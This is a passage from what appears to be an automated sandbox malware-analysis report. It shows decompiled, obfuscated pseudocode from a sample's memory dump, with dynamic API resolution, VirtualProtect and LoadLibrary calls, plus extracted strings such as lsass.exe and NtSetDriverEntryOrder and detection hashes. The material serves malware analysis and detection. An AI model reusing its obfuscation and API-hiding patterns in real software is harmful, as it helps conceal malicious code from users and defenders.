                      				 *0x50bf11 =  *0x50bf11;
                      				_t99 = _t97;
                      				_t27 =  *(_t105 - 8);
                      				 *((intOrPtr*)(_t105 - 0x14)) = _t99;
                      				if(_t52 < 0) {
                      					if(_t93 >= 0) {
                      						 *0x509028 =  *0x509028 + _t27;
                      					}
                      					_t52 =  *0x509900; // 0x0
                      				}
                      				 *0x5090a6 =  *0x5090a6 + _t52;
                      				 *0x509c54 = _t52;
                      				 *0x50915c = _t72;
                      				_push( *((intOrPtr*)(_t105 - 0x14)));
                      				_push( *((intOrPtr*)(_t105 - 0x10)));
                      				_t57 =  *0x509cc8; // 0x0
                      				 *0x509f04 =  *0x509f04 + _t57;
                      				_t103 = _t99;
                      				_t28 = GetProcAddress(??, ??);
                      				 *0x50ab68 =  *0x50ab68;
                      				 *(_t105 - 8) = _t28;
                      				_t75 =  *0x5091aa; // 0x1
                      				 *0x50bf10 =  *0x50bf10 - _t75;
                      				_t30 =  *(_t105 - 8);
                      				 *0x5090c6 =  *0x5090c6 - 0x291cb5;
                      				_push(_t30);
                      				 *0x50bf09 =  *0x50bf09 + _t30;
                      				_push(0x52396a);
                      				E004AC2F5();
                      				_pop(_t31);
                      				_push(_t31);
                      				 *0x5091ce = 0x1d79e;
                      				if((E004B4838(_t31, 0x3c7b7d, 0x1d79e, _t93, _t103, 0x1d79e) & 0x000000b9) < 0) {
                      					 *0x50bf17 = 0xe1;
                      				}
                      				_pop(_t34);
                      				if(_t34 != 0) {
                      					 *0x50bf14 =  *0x50bf14 - _t34;
                      					_t35 = _t34;
                      					if(_t93 + _t93 <= 0) {
                      						 *0x50bf07 = _t35;
                      					}
                      					 *(_t105 - 0xc) = _t35;
                      					 *0x509c5c = 0xffffffffffffffd0;
                      					 *0x50915c = 0x590256;
                      					_t77 =  *0x50918c; // 0x1
                      					_t38 =  *(_t105 - 0xc);
                      					 *0x509810 =  *0x509810 - _t38;
                      					 *(_t105 - 8) = _t38;
                      					 *0x50bf10 =  *0x50bf10 + _t77;
                      					_t34 =  *(_t105 - 8);
                      					 *0x5097b4 = _t34;
                      					_push(_t34);
                      					_push(0);
                      					_push(_t103);
                      					_push(E004BFCA1);
                      					goto __esi;
                      				}
                      				return _t34;
                      			}

                      APIs
                      • GetProcAddress.KERNEL32(?,?), ref: 004BFB7C
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: WFServicesReg.exe$api-ms-win-core-localization-l1-1-0.dll$sxproxy.dll$ucmhc.dll$}{<
                      • API String ID: 190572456-3469982134
                      • Opcode ID: 446bca627f78835192db30653a072d400cf5556b32ad5c1714e1fa2ea7183dc0
                      • Instruction ID: 6c02480fccaccdafaaa49699b66b8a4fdbceb72af2cd6b678bbead1452f72ce5
                      • Opcode Fuzzy Hash: 446bca627f78835192db30653a072d400cf5556b32ad5c1714e1fa2ea7183dc0
                      • Instruction Fuzzy Hash: 85517C75A483469FDB01DFB9ECD86CD7FB1EB79310B08486AD8449332AD3740949EBA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 36%
                      			E00490E77() {
                      				signed int _t34;
                      				signed int _t36;
                      				signed int _t38;
                      				signed char _t42;
                      				_Unknown_base(*)()* _t43;
                      				signed int _t48;
                      				signed int _t50;
                      				void* _t57;
                      				unsigned short _t59;
                      				void* _t95;
                      				signed int _t96;
                      				void* _t98;
                      				intOrPtr _t99;
                      				short _t100;
                      				signed int _t104;
                      				signed int _t105;
                      				signed int _t107;
                      				intOrPtr _t109;
                      				void* _t111;
                      				void* _t112;
                      				void* _t113;
                      				void* _t115;
                      
                      				_t34 =  *(_t115 - 8);
                      				_t59 = _t57 + 0x350437 >> _t96;
                      				 *(_t115 - 0x58) = _t34;
                      				_t98 = (_t96 & 0x00000075) + 0x7d;
                      				_t105 = _t104 | 0x0000008d;
                      				 *0x50a8ac =  *0x50a8ac + _t105;
                      				 *(_t115 - 8) = _t34;
                      				_t36 =  *(_t115 - 8);
                      				if(_t36 <= 0x2e) {
                      					_t95 = _t59 + _t59 - 0x46;
                      					 *0x5090fa =  *0x5090fa - _t95;
                      					_t59 = _t95 + _t98;
                      				}
                      				_t99 =  *0x509144; // 0x5f92
                      				_t100 = _t99 - 1;
                      				 *0x5091ac = _t105;
                      				_t107 = 0x9bd0;
                      				_push( *(_t115 - 0x58));
                      				_t112 = _t111 + 0xcc5343;
                      				 *(_t115 - 8) = _t36;
                      				_t38 =  *(_t115 - 8);
                      				 *(_t115 - 8) = _t38;
                      				if(_t38 >= 0x19) {
                      					_t100 = _t100 - 0x5fdf;
                      					 *0x50916a = _t100;
                      					 *0x509182 = _t100;
                      					if(0x8340 != 0) {
                      						_t107 = 0x9710;
                      						 *0x509206 = 0x9710;
                      						 *0x50921e = 0x9710;
                      					}
                      					 *0x509346 =  *0x509346 - _t113;
                      					_t112 = _t112 + _t112;
                      					_t38 = 0xf2;
                      					 *0x50bf17 =  *0x50bf17 - 0xf2;
                      				}
                      				 *((intOrPtr*)(_t115 - 0x10)) =  *((intOrPtr*)(_t115 - 0x10)) - 0x1e5a69;
                      				 *0x50bf0c =  *0x50bf0c + _t100;
                      				_t42 =  *(_t115 - 8);
                      				_push( *0x50944c);
                      				if(_t100 != _t100 || 0x71bb >= 0x71bb) {
                      					_t109 =  *0x5091d6; // 0x95a2
                      					_t107 = _t109 - 0x895c2a;
                      					 *0x509226 =  *0x509226 + _t107;
                      					if((_t42 & 0x000000bc) < 0) {
                      					}
                      				}
                      				 *0x50ba27 =  *0x50ba27 + _t112;
                      				_t43 = GetProcAddress(??, ??);
                      				if((_t107 & 0x00915e4b) <= 0) {
                      					 *0x50b232 =  *0x50b232 - _t113;
                      					_t112 = _t112 - 0xe128;
                      					 *0x509654 =  *0x509654 + _t112;
                      				}
                      				 *(_t115 - 8) = _t43;
                      				E0046624A( *(_t115 - 8), 0, 0x50a8c0, _t112, _t113,  *(_t115 - 8));
                      				_t48 =  *(_t115 - 8);
                      				 *0x509c28 = _t48;
                      				if(_t113 < 0) {
                      					 *0x50bac3 =  *0x50bac3 + _t112;
                      					 *0x50bf09 =  *0x50bf09 + _t48;
                      				}
                      				 *(_t115 - 8) = _t48;
                      				_t50 =  *(_t115 - 8);
                      				 *(_t115 - 8) = _t50;
                      				 *(_t115 - 0xc) =  !_t50;
                      				 *((intOrPtr*)(_t115 - 0x1c)) = 0x33fde7;
                      				 *0x50bf0a =  *0x50bf0a;
                      				 *0x5090a2 =  *0x5090a2 + 0x67fbce;
                      				_push(1);
                      				_push(0xcff79c);
                      				_push(E004910AA);
                      				goto __ebx;
                      			}

                      APIs
                      Strings
                      • Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.Resources.dll, xrefs: 00491064
                      • j>0, xrefs: 0049101E
                      • G.V, xrefs: 0049108C
                      • NtSetDriverEntryOrder, xrefs: 00490FF7
                      • WSManHTTPConfig.exe, xrefs: 00490EF4
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: G.V$Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.Resources.dll$NtSetDriverEntryOrder$WSManHTTPConfig.exe$j>0
                      • API String ID: 190572456-2811260348
                      • Opcode ID: 16c1b107f712106d59b1db2d2d27c8b73c566b13f9b71947c3d3fa4959496397
                      • Instruction ID: 70318d716b1a3c22b8f9e77c1c564e80efa808e55bb97d55ae0295a338c20ebc
                      • Opcode Fuzzy Hash: 16c1b107f712106d59b1db2d2d27c8b73c566b13f9b71947c3d3fa4959496397
                      • Instruction Fuzzy Hash: 275188B6E107469FDB00DFA9E8D46CD7BB1EB39314B08807AD844E776AE3750A48DB14
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 32%
                      			E004F97E5(void* __eax, void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi) {
                      				signed int _t15;
                      				void* _t18;
                      				int _t19;
                      				signed int _t22;
                      				signed int _t23;
                      				intOrPtr _t24;
                      				void* _t27;
                      				intOrPtr _t31;
                      				void* _t43;
                      				void* _t53;
                      				intOrPtr _t66;
                      				intOrPtr _t73;
                      				signed int _t74;
                      				signed short _t76;
                      				void* _t82;
                      				void* _t83;
                      				void* _t86;
                      				void* _t88;
                      
                      				_t86 = __esi;
                      				_t82 = __edi;
                      				_t64 = __ecx;
                      				if(__eax >= 0x14423c) {
                      					 *0x50bf0e =  *0x50bf0e + __ecx;
                      					_t64 = 0x7d16;
                      				}
                      				_t73 =  *0x5091fe; // 0x8d5f
                      				_t15 =  *(_t88 - 0xc);
                      				 *0x509860 = _t15;
                      				 *(_t88 - 8) = _t15;
                      				_t74 = _t73 - 0x95;
                      				_t43 = ( !("WSManHTTPConfig.exe") ^ _t64) + 0x1e;
                      				_t18 =  *(_t88 - 8);
                      				if(_t18 <= 7) {
                      					L5:
                      					 *0x50bf10 =  *0x50bf10 - _t64;
                      					_t74 =  *0x5091fe; // 0x8d5f
                      				} else {
                      					 *0x50bf0a =  *0x50bf0a + _t18;
                      					if(_t43 - 1 <= 0x2e52) {
                      						goto L5;
                      					}
                      				}
                      				_t76 = _t74 | 0x0000b45c;
                      				_t19 = ReadFile( *(_t88 - 0x34), ??, ??, ??, ??);
                      				_t83 = _t82 - 0x332;
                      				 *0x5094f4 = _t19;
                      				_push(_t19);
                      				if(_t83 < 0) {
                      					L11:
                      					 *0x50920a = _t76;
                      				} else {
                      					_t31 =  *0x5095ec; // 0x0
                      					 *0x5099c8 = _t31;
                      					 *(_t88 - 8) = _t64;
                      					_t64 = _t64 - 0x784f;
                      					if((_t76 & 0x00009fbb) > 0) {
                      						L9:
                      						_t19 = 0x9d7b1;
                      						 *0x509c20 =  *0x509c20 + 0x2d32fc;
                      						 *(_t88 - 8) = 0x2d32fc;
                      						_t64 = _t64 + 0x57a089;
                      						 *0x50bf0f =  *0x50bf0f + _t64;
                      						if(_t64 >= _t64) {
                      							_t76 =  *0x5091ba; // 0x1ef3
                      							goto L11;
                      						}
                      					} else {
                      						 *0x50bf13 = _t31;
                      						_t19 = 0xda;
                      						if(_t83 == 0) {
                      							goto L9;
                      						}
                      					}
                      				}
                      				 *0x50b8f5 =  *0x50b8f5 - _t86;
                      				_pop(_t22);
                      				_push( *(_t88 - 0x34));
                      				 *(_t88 - 8) = _t22;
                      				_t23 =  *(_t88 - 8);
                      				 *0x5091aa = _t64 - 0x85;
                      				 *0x50bf12 = _t23;
                      				_t66 =  *0x509194; // 0x0
                      				 *0x509760 = _t23;
                      				 *0x50bf13 =  *0x50bf13 - 0xffffffffffeac939;
                      				_t53 = _t66 - 1;
                      				_push(_t23);
                      				 *0x50b3e6 =  *0x50b3e6 - _t86;
                      				_t24 = E004CFCA6(_t66 - 1, 0x94a1, 0xf449, _t86, 0);
                      				if(_t24 >= 0) {
                      					if(_t24 < 0) {
                      						 *0x50bf0b =  *0x50bf0b + _t53 + 0x3081b7;
                      						 *0x509194 =  *0x509194 - 0x7528;
                      					}
                      					 *0x50bf15 = 0xcf;
                      					_t24 =  *0x50bf17; // -1
                      					 *0x50bf39 =  *0x50bf39 - 0xf449;
                      					 *0x50bf07 =  *0x50bf07 + _t24;
                      				}
                      				_pop(_t27);
                      				_push(0x4f99e2);
                      				_push( *0x509a7c);
                      				return _t27;
                      			}

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: FileRead
                      • String ID: G.V$MapUserPhysicalPages$NtSetDriverEntryOrder$WSManHTTPConfig.exe$api-ms-win-core-localization-l1-1-0.dll
                      • API String ID: 2738559852-543457631
                      • Opcode ID: b013e44b998be32d82bc1eeb0a002b1799ea455b3b75d076d6fd1a44f61c428a
                      • Instruction ID: 69860d8440ca08b454fd6ee87b4648ea6834a2142894cf6a27f51af7cb68f5f8
                      • Opcode Fuzzy Hash: b013e44b998be32d82bc1eeb0a002b1799ea455b3b75d076d6fd1a44f61c428a
                      • Instruction Fuzzy Hash: 7741F275A542474FEB019F79ECE57CD3BE2EB3A310B08482AD950873A7D3690949EB14
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 38%
                      			E004A2425(signed int __ebx, void* __edi, signed int __esi) {
                      				unsigned short _t27;
                      				unsigned short _t31;
                      				_Unknown_base(*)()* _t32;
                      				unsigned short _t36;
                      				signed int _t39;
                      				intOrPtr _t41;
                      				intOrPtr _t44;
                      				intOrPtr _t75;
                      				void* _t76;
                      				signed int _t78;
                      				void* _t79;
                      				signed int _t80;
                      				signed int _t82;
                      				signed char _t85;
                      				signed short _t88;
                      				intOrPtr _t90;
                      				void* _t95;
                      
                      				_t94 = __esi;
                      				_t92 = __edi;
                      				_t39 = __ebx;
                      				_t27 =  *(_t95 - 8);
                      				 *(_t95 - 0x18) = __ebx;
                      				if(__ebx == __ebx) {
                      					 *((intOrPtr*)(_t95 - 0x28)) =  *((intOrPtr*)(_t95 - 0x28)) - 0x6484;
                      					_t75 =  *0x509192; // 0x9624
                      					 *0x5091fa = 0x8bf0;
                      					_t88 = 0x8c9e;
                      					_t94 =  !__esi;
                      					 *0x50bf14 = _t27;
                      					_t92 = 0;
                      					_t39 = 0x1f8f;
                      				}
                      				 *(_t95 - 0x10) = _t27;
                      				if(_t39 > 0x3641) {
                      					_t39 = 0x45dfb8;
                      					 *((intOrPtr*)(_t95 - 0x20)) = _t75;
                      				}
                      				_t76 = _t75 - 0x77;
                      				 *(_t95 - 8) = _t27;
                      				if(_t27 < 0x17c3) {
                      					 *(_t95 - 0x18) =  !(_t39 + 0x2a868e);
                      				}
                      				_t78 =  !(_t76 - 0x60);
                      				 *0x50917e = _t78;
                      				_push( *0x509528);
                      				_t41 =  *((intOrPtr*)(_t95 - 0x20)) + 0x3a;
                      				_t31 =  *(_t95 - 8);
                      				 *((intOrPtr*)(_t95 - 0x1c)) = _t41;
                      				if(_t41 == _t41) {
                      					_t78 = 0x68b2;
                      					_t90 =  *0x5091b6; // 0xc472
                      					_t88 = _t90 - 0x9800;
                      					 *0x509224 = _t94;
                      					if(_t31 < 0) {
                      						 *0x50b9ff =  *0x50b9ff + _t92;
                      					}
                      					 *0x5094f4 = _t31;
                      				}
                      				 *((intOrPtr*)(_t95 - 0x24)) =  *((intOrPtr*)(_t95 - 0x24)) - _t78;
                      				_t79 = _t78 - 0x6cfa7f;
                      				if((_t88 & 0x00008947) < 0) {
                      					 *0x5091d6 = _t88;
                      					_t88 = 0x509226;
                      					_t94 = _t94 + 1;
                      					 *0x50bf13 = _t31;
                      				}
                      				_t44 =  *0x50bf15; // 0x0
                      				_t32 = GetProcAddress(??, ??);
                      				 *0x50abf4 =  *0x50abf4 - _t88;
                      				 *0x50bf12 = _t32;
                      				 *(_t95 - 8) = _t32;
                      				E0046624A(_t32, _t79, _t88, _t92, _t94, _t32);
                      				 *0x5090c4 =  *0x5090c4 + (_t44 - 0x000024de | 0x002f35ea);
                      				_t80 = _t79 + 1;
                      				 *0x50915e =  *0x50915e + _t80;
                      				_t82 = (_t80 ^ 0x006eda3e) + 0x75ec80;
                      				 *0x5091fa = 0x9340;
                      				 *0x509078 =  *0x509078 - 0x1aef02;
                      				if(0x55 >= 0x55) {
                      				}
                      				_t85 = (_t82 & 0x00000066) + 0x61a599;
                      				 *0x5091ac = _t85;
                      				_t36 =  *(_t95 - 8);
                      				 *0x50a8fc = _t36;
                      				 *0x509134 = _t85;
                      				 *(_t95 - 8) = _t36;
                      				_push(1);
                      				_push(0x4a2615);
                      				_push(E0046624A);
                      				return _t36 >> _t85;
                      			}





















                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: A6$HMETAFILEPICT_UserSize$NtSetDriverEntryOrder$WSManHTTPConfig.exe$_isdel.exe
                      • API String ID: 190572456-2426748350
                      • Opcode ID: 91ad246b887e84d9937a1272d5eaef3181bc796c486856d3242dc0ffb7bbc0db
                      • Instruction ID: 29cc924d3efdcf558e44a0a19b0281d4db837051aa641c1518c04c0950987f7e
                      • Opcode Fuzzy Hash: 91ad246b887e84d9937a1272d5eaef3181bc796c486856d3242dc0ffb7bbc0db
                      • Instruction Fuzzy Hash: 4D41AF75E452078FDB00EF78EDA86DD7BB0FB3A320F08442AC94597366E2780545EB55
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • GetProcAddress.KERNEL32(0034CF6A,00000001), ref: 0048767D
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: P@.$RtlReleaseRelativeName$i"$lsass.exe$wuapi.dll
                      • API String ID: 190572456-3199093101
                      • Opcode ID: edf52f53267c5d8bc9fe93feccd6869084651a64fab75a745e2f5f15a9f9d45b
                      • Instruction ID: 9f76a2d0efd0808698985920b7cb1083ce84913dd00e468bcb1f9471c6a7be5f
                      • Opcode Fuzzy Hash: edf52f53267c5d8bc9fe93feccd6869084651a64fab75a745e2f5f15a9f9d45b
                      • Instruction Fuzzy Hash: B341DD75A903069BDB00EFB8DC947DC7FB0EB29320F14457AA944E73A6E3784949DB09
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • GetProcAddress.KERNEL32(?), ref: 004861BC
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: G.V$IMCCPHR.exe$OSProvider.dll$RtlReleaseRelativeName$wuapi.dll
                      • API String ID: 190572456-2251616715
                      • Opcode ID: ef47649ccf2337c4fcae72d43d769eac80a3773b2cfe6f7c0693458a50d3eb7b
                      • Instruction ID: 96f18e93604dc53cd786b88e902b8be42ed8e8a9f3da2c776e553b7e533bb983
                      • Opcode Fuzzy Hash: ef47649ccf2337c4fcae72d43d769eac80a3773b2cfe6f7c0693458a50d3eb7b
                      • Instruction Fuzzy Hash: FD315EB8E50206AFCB40EFA9D8D45DDBBF1FB28310F5084AAA544E7352E2754A858B45
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • GetProcAddress.KERNEL32(?), ref: 0049AEEC
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: |z$NtSetDriverEntryOrder$RegDeleteKeyExW$WFServicesReg.exe
                      • API String ID: 190572456-921050554
                      • Opcode ID: dadb75853f3544d3dfa7101fe6e4c6577e319bacc15cdb8ef1435ccb74896be1
                      • Instruction ID: 96f04bcd93e5bcb3d3475e432c18fceb3367970385e61c3297cb7be2eb6d563d
                      • Opcode Fuzzy Hash: dadb75853f3544d3dfa7101fe6e4c6577e319bacc15cdb8ef1435ccb74896be1
                      • Instruction Fuzzy Hash: 89519FA5A453469FDB009FB8EC981CE7FF1EB79320B08446AC840A7766E3350949EB95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: G`}$PX/$RegDeleteKeyExW$dpnet.dll
                      • API String ID: 190572456-194329602
                      • Opcode ID: 7908ead54665570a050e3c9a7a4c473c85ca06acbc5ea0ba91d0b9bf6b68e0fd
                      • Instruction ID: fa9d7f7b431aeb8cfc05583b053dc537c6d8c986353bce48fdbebf8aaf3ec5c5
                      • Opcode Fuzzy Hash: 7908ead54665570a050e3c9a7a4c473c85ca06acbc5ea0ba91d0b9bf6b68e0fd
                      • Instruction Fuzzy Hash: DC41E1B5F403069FEB009FA9EC942DD7BB0FB7A300F04402AD945A7322E3780948DB45
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 85%
                      			E0049E29A(void* __ebx, void* __ecx, short __edx, void* __edi, short __esi) {
                      				_Unknown_base(*)()* _t28;
                      				_Unknown_base(*)()* _t42;
                      				_Unknown_base(*)()* _t45;
                      				signed int _t53;
                      				short _t81;
                      				short _t92;
                      				void* _t97;
                      
                      				_t92 = __esi;
                      				_t81 = __edx;
                      				_t28 =  *(_t97 - 8);
                      				_t53 = "CoLockObjectExternal";
                      				 *(_t97 - 0x1c) = _t53;
                      				if(__ecx != __ecx) {
                      				}
                      				 *(_t97 - 8) = _t28;
                      				 *(_t97 - 0x14) = _t53;
                      				 *(_t97 - 0x10) =  !_t53;
                      				 *((intOrPtr*)(_t97 - 0x20)) = 0xfffffffffffffff0;
                      				 *0x5091be = _t81;
                      				 *(_t97 - 0x1c) = 0x30a778;
                      				_t79 = 0x658e;
                      				 *0x509194 = 0x658e;
                      				 *0x509232 = _t92;
                      				_t42 = GetProcAddress( *0x5094c4,  *(_t97 - 0x58));
                      				 *0x5091e8 =  *0x5091e8 -  !0x9cbf;
                      				if(_t42 >= 0) {
                      					 *0x50bf17 = _t42;
                      					 *0x509068 =  *0x509068 + _t42;
                      					_t79 = 0x6f87;
                      					 *0x50919c = 0;
                      				}
                      				 *(_t97 - 8) = _t42;
                      				_t45 =  *(_t97 - 8);
                      				 *0x50a38c = _t45;
                      				 *(_t97 - 8) = _t45;
                      				 *((intOrPtr*)(_t97 - 0x18)) = 0x3556d3;
                      				 *0x50bf0e =  *0x50bf0e - _t79;
                      				 *0x509172 = _t79;
                      				_push(0);
                      				_push(0);
                      				_push(E0049E43C);
                      				_push(E00466493);
                      				return "api-ms-win-core-namedpipe-l1-1-0.dll";
                      			}











                      APIs
                      • GetProcAddress.KERNEL32(?), ref: 0049E37A
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: CoLockObjectExternal$System.Xml.XmlDocument.dll$api-ms-win-core-namedpipe-l1-1-0.dll$dpnet.dll
                      • API String ID: 190572456-3678666635
                      • Opcode ID: 1d2f4792602e884e94149346021dbc3170761fd6e0954eab118fd8d1944bb4b1
                      • Instruction ID: 5802341196f50252b691e5d22b055162431739beaeab9fbd15fc10aff236aca4
                      • Opcode Fuzzy Hash: 1d2f4792602e884e94149346021dbc3170761fd6e0954eab118fd8d1944bb4b1
                      • Instruction Fuzzy Hash: 65418B78A503078FCB00EFB9D8956DD7FB0FB28320F404079A945EB356D2785A89DB44
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • GetProcAddress.KERNEL32(00000001,?), ref: 0048E481
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: NtPowerInformation$RegDeleteKeyExW$api-ms-win-core-localization-l1-1-0.dll$wuapi.dll
                      • API String ID: 190572456-1757965098
                      • Opcode ID: a2524ce9b262307449db36b76079d3b283814d74b0bb401a63274798df064788
                      • Instruction ID: 12eb7d0b01f60a2eb0e7f533919c9d49ba91fdc9a8895f3c4e38592a38ca1dc9
                      • Opcode Fuzzy Hash: a2524ce9b262307449db36b76079d3b283814d74b0bb401a63274798df064788
                      • Instruction Fuzzy Hash: 6341D075E4030AAFDB00EFB9D8956DE7BB0FB28714F00442AE944A7396E3780989DB55
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • GetProcAddress.KERNEL32(?), ref: 004A0110
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: System.Xml.XmlDocument.dll$WinFax.dll$mscpxl32.dLL$.;
                      • API String ID: 190572456-389468254
                      • Opcode ID: aea1ad52d7b82e2fcec096bf515ec5bbf7127c948d52636fb4f678d5d13b8fa2
                      • Instruction ID: 071598ed832862a5869099791c9d62c9383e8f6a203e3860c0e53757b1a00eaf
                      • Opcode Fuzzy Hash: aea1ad52d7b82e2fcec096bf515ec5bbf7127c948d52636fb4f678d5d13b8fa2
                      • Instruction Fuzzy Hash: 59419F74A14247DFCB00DFB8E8986DE7BB0FB3A310F0445AAD885A7366E3340A49DB41
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • GetProcAddress.KERNEL32(?), ref: 0047EE71
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: WSManHTTPConfig.exe$api-ms-win-core-localization-l1-1-0.dll$ucmhc.dll${b$
                      • API String ID: 190572456-2742298630
                      • Opcode ID: 613266b4cb4cce2c547c498ffb83ee92eaf9eaa098accef3b2fd572d3c6a19d2
                      • Instruction ID: 92a46d0782c5da4e5dff6b82ea96a030fba7ef655aaf63908d2734e255e97e4d
                      • Opcode Fuzzy Hash: 613266b4cb4cce2c547c498ffb83ee92eaf9eaa098accef3b2fd572d3c6a19d2
                      • Instruction Fuzzy Hash: 08219CB9A04742DBD700DFBAECD46DD7BB1EB38300B08486AD84893326E3350949EB06
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • VirtualProtect.KERNEL32(?), ref: 004F450A
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID: MapUserPhysicalPages$`gqt$normaliz.dll
                      • API String ID: 544645111-3747997548
                      • Opcode ID: feafa5f6372eae6467669e8b1ec306047616b299c68bbe3b91d67ccd45b51ad6
                      • Instruction ID: 4f016ce403e3f08856b0998489b65140e974e3ee9e565108c68992d7c45ea5f8
                      • Opcode Fuzzy Hash: feafa5f6372eae6467669e8b1ec306047616b299c68bbe3b91d67ccd45b51ad6
                      • Instruction Fuzzy Hash: 99411466F0434A9FDB009F79DCD46EE7BB1EBBA310F084469DA40A7352D3780909DB10
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • LoadLibraryA.KERNEL32(00000000,00000000,?), ref: 0046B7B9
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: LibraryLoad
